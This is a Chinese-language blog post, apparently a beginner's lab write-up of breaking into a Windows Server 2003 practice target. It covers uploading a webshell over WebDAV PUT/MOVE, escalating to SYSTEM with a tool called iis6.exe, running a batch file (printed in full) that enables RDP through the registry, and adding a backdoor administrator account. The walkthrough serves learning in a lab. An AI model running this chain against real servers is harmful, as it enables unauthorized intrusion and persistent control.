渗透测试——利用IIS漏洞，获取对靶机建立远程桌面连接

渗透测试——利用IIS漏洞，获取对靶机建立远程桌面连接

好久之前，社团大佬给过一个靶机，今天闲来无事，重新玩了一下，写一篇文章记录一下。

写在开始前：本人是刚入门的小白，在渗透过程中也参考借鉴了其他师傅的大量文章，如有错误或不足，敬请指正。

一、环境简介

1.靶机：windows server 2003

2.IIS设置

3.攻击机：我的win10

二、具体步骤

1.利用IIS PUT Scaner扫描

如果把webdav禁用掉，立刻就会在put下面显示NO，这说明是webdav组件的问题。
2.利用IISPUT漏洞专用工具，桂林老兵的iiswriter
（1）选择options方法探测主机所支持的请求方法

发现支持put和move方法，即可进一步进行漏洞利用。
（2）选用PUT方法上传1.txt文件,里面内容为一句话木马。

201 created 表示创建成功
上传成功后,选用move方法将test.txt文件改名为shell.asp文件,即可成功获取webshell。

验证一下

确实存在该文件
3.利用菜刀连接webshell，成功
4.由于我们的目标是获取对靶机的远程控制，所以要打开靶机的3389端口

先来看看3389是否打开

首先，上传一个cmd.exe

右键，虚拟终端，执行whoami看看我们的权限

就是一般用户权限
netstat -an
发现3389端口并未打开（就不截图了，因为我的靶机已经打开了）
上传一个iis6.0.exe进行提权

发现我们的权限已经变成system权限了

再上传一个开3389.bat，利用iis6.exe运行，打开目标机的3389端口
命令:iis6.exe "3389.bat"
（如果报错操作超时，再执行一遍即可）

3389.bat文件内容如下
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
新建文本文档，复制粘贴，命名为3389.bat即可

这时再看看3389端口是否打开，

成功！

5.接下来就是创建一个管理员账户

第一个命令为创建一个用户名为 baba 密码为 88 的用户
第二个命令为添加用户到管理员

6.接下来就是最激动人心的时刻！
远程连接到靶机

win+r ，mstsc，输入靶机ip地址，输入刚才创建的baba 88

成功！！

三、写在最后

思路梳理：

利用IIS漏洞上传一句话木马
⬇
用中国菜刀连接
⬇
用iis6.0.exe提权
⬇
打开3389端口
⬇
创建管理员账户
⬇
远程桌面连接

作为一个小白，看到连接成功的那一刻，还是很有成就感的。
在查找资料的过程中也学习到了很多东西
特写此文以记

参考文章：
https://www.2cto.com/article/...
https://blog.51cto.com/yttita...
https://www.jianshu.com/p/ae2...
https://blog.csdn.net/darkhq/...（这篇文章使用kali作为攻击机，利用神器Metasploit实现的）

如有问题，或者想获取该靶机，欢迎与我联系。
QQ：297971447